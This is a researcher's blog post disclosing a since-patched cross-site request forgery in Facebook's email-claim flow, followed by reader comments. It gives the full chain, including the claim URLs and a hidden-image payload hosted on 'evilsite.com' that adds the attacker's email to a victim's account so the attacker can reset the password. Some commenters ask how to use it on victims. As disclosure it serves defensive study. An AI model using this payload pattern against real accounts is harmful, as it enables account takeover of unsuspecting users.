A critical vulnerability existed in Facebook that allowed an attacker to easily take complete control of any Facebook account. If the victim is logged into Facebook, all the attacker has to do is get the victim to load a single link. Once the link has loaded, the attacker can reset the victim's password.
The vulnerability exists in the "claim email address" component of Facebook.
When a user tries to add an email address that already exists in the Facebook system, they have the option to "claim it".
When completing a claim, Facebook did not check which account had initiated the request. The final step of the claim could therefore be completed against any logged-in Facebook account, i.e. a classic cross-site request forgery (CSRF) in the claim flow.
In order to exploit this, you need 2 Facebook accounts.
1. An account with the email address (that you want to claim) already added to it.
2. Another account to initiate the claim process.
For example:
When making a claim request for a @hotmail.com email, you are taken to a link that looks like this:
https://www.facebook.com/support/openid/proxy_hotmail.php?appdata[fbid]=AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs
Updated (July 16th):
--------------------------------------------------------------------------------------------------
Some people asked me to clarify how I got the link above, so I've added 2 new visuals below:
After the exploit was fully patched, here is what happens when you try to claim an email:
Since I did not take a screenshot of the claim process before the patch, I will provide an edited image of what the Claim popup dialog looked like (it's not exact):
Clicking on the "Claim" button would automatically redirect you to the link above.
--------------------------------------------------------------------------------------------------
I found out that this parameter, appdata[fbid], was the encrypted email address. For this demonstration, the encrypted email was "funnyluv196@hotmail.com". The link redirects you to the Hotmail sign-in page. You must sign in with the email address that matches the encrypted parameter. Once signed in, you are taken to a final link that looks like this:
https://www.facebook.com/support/openid/accept_hotmail.php?appdata=%7B%22fbid%22%3A%22AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs%22%7D&code=a6893043-cf19-942b-c686-1aadb8b21026
Viewing the page source shows that the claim email process has succeeded:
<script type="text/javascript">window.opener.location.href = "\/claim_email\/add_email\/check_code?email=funnyluv196\u002540hotmail.com&openid=1"; window.close();</script>
There were two important aspects which made this exploit simple:
- The link expires only after around 3 hours, giving an attacker plenty of time to use it.
- It can be visited from any Facebook account, because there is no check that the account completing the claim is the one that requested it.
All a hacker has to do is embed this link in a web page as either a hidden image or an iframe. Example:
<img src="https://www.facebook.com/support/openid/accept_hotmail.php?appdata=%7B%22fbid%22%3A%22AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs%22%7D&code=a6893043-cf19-942b-c686-1aadb8b21026" width="0" height="0"/>
The victim is then sent a link to that page, for example:
http://evilsite.com/evilpage.html
Once the page loads, the victim's browser sends the request with the victim's Facebook session cookie, and the email (in this case funnyluv196@hotmail.com) is instantly added to the victim's account. The victim receives no notification whatsoever that this email has been added.
The hacker can then reset the victim's password using the newly added email address, taking complete control of the Facebook account.
This vulnerability has been confirmed to be patched by the Facebook Security Team.
Video Demonstration Below:
(HD option is available.)
~Dan Melamed
How did you decrypt the code? And what kind of encryption is that?
I never decrypted the fbid parameter. When I attempt to add an email address that already belongs to another Facebook account, a popup shows up asking me if I want to "claim it". Clicking on that would generate the fbid parameter inside that link and you'd go on from there.
Can you please explain to me how you got this link? https://www.facebook.com/support/openid/proxy_hotmail.php?appdata[fbid]=AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs
So you can send this link to the victim? With my email put in?
Once you have the final link you can send it to anyone and it'll add your email to their account. But please remember that this has already been patched.
How do I make the claim request for the email?
Critical Facebook vulnerability allows account hacking
http://www.dan-melamed.com/2013/06/hacking-any-facebook-account-exploit-poc.html
How do you generate this link... https://www.facebook.com/support/openid/proxy_hotmail.php?appdata[fbid]=AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs or is it just for copy and paste?
I've explained this in one of the comments posted on my YouTube video.
Friend, does the method still work, or has Facebook already corrected this error?
Is it already patched? So we are wasting our time trying it, right?
Hi Dan, thanks for sharing the details of this flaw.
As far as I can see, Facebook uses Hotmail's API in the claiming process and I am wondering how much this has to do with the vulnerability. What can you say about this point? Have you tried with non-Hotmail email addresses?
Yes, the other two vulnerable addresses were Gmail and Yahoo. But both of them used an openid link which was vulnerable to CSRF too. But that issue was fixed before I was able to record a video. So for simplicity, I wrote about the hotmail flaw.